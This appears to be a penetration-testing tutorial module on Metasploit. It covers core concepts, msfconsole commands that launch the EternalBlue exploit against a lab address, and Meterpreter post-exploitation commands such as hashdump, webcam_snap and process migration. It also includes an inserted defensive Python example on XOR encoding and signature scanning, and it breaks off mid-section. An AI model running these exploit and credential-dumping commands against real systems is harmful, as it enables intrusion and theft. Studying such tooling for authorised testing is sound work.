Metasploit Framework (MSF) is the world’s most widely-used exploitation platform. It bundles thousands of exploits, payloads, post-exploitation modules, and auxiliary tools under one console. This module gets you comfortable launching your first authorised exploit and understanding what MSF is doing behind the scenes.
Core concepts
- Exploit: code that takes advantage of a vulnerability
- Payload: what runs after successful exploitation (reverse shell, Meterpreter session, staged shellcode)
- Encoder: transforms payload bytes to evade simple signature detection
- Auxiliary: scanners, fuzzers, DoS tools (things that aren’t exploits but support the workflow)
- Post: modules run against an established session (credential harvesting, privilege escalation, persistence)
- Listener / Handler: the attacker-side component awaiting callback from a payload
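The Encoder entry above, seen from the detection side, as an added example that is not part of the original module: an exact-match byte signature stops firing once the bytes are XOR-encoded, and a scanner that sweeps all single-byte keys recovers the match. The marker string, sample bytes and function names are constructed for illustration and are not Metasploit code or a real payload.

```python
"""Why exact-match signatures miss encoded bytes, and one simple countermeasure."""

# Constructed, harmless stand-ins (assumptions, not real payload bytes).
SIGNATURE = b"DEMO-PAYLOAD-MARKER"
SAMPLE = b"\x90\x90" + SIGNATURE + b"\x00tail"


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the simplest form of byte-level encoding."""
    return bytes(b ^ key for b in data)


def naive_scan(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Static signature check: fires only on an exact byte match."""
    return signature in blob


def xor_aware_scan(blob: bytes, signature: bytes = SIGNATURE):
    """Return the XOR key under which the signature appears, else None.

    Encoding the short signature under each of the 256 keys and searching
    for it is cheaper than decoding the whole blob 256 times.
    A result of 0 means the signature is present unencoded.
    """
    for key in range(256):
        if xor_encode(signature, key) in blob:
            return key
    return None


if __name__ == "__main__":
    encoded = xor_encode(SAMPLE, 0x5A)
    print("naive scan, plain bytes:  ", naive_scan(SAMPLE))
    print("naive scan, encoded bytes:", naive_scan(encoded))
    print("key found by sweep:       ", hex(xor_aware_scan(encoded)))
```

A key sweep like this only covers fixed single-byte XOR; encodings whose key changes as they go defeat it, which is why static matching is paired with behaviour-based detection.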
Launching msfconsole
# Kali / Ubuntu
msfconsole
# Update module database (first run or periodically)
msfupdate
# Inside msfconsole:
search type:exploit name:eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.0.0.5
set LHOST 10.0.0.100
exploit
Meterpreter: the post-exploit Swiss army knife
Meterpreter is MSF’s signature payload. It lives entirely in memory (no file on disk), provides a cross-platform command API, and supports extensive post-exploitation:
# After a session is established
meterpreter > sysinfo # OS info
meterpreter > getuid # who am I
meterpreter > getprivs # privileges
meterpreter > hashdump # dump local SAM hashes
meterpreter > screenshot # screencap
meterpreter > webcam_snap # ...
meterpreter > migrate 1234 # move into another process
meterpreter > run post/multi/gather/env
The -r resource script pattern
Repeatable workflows save time. Create a .rc file: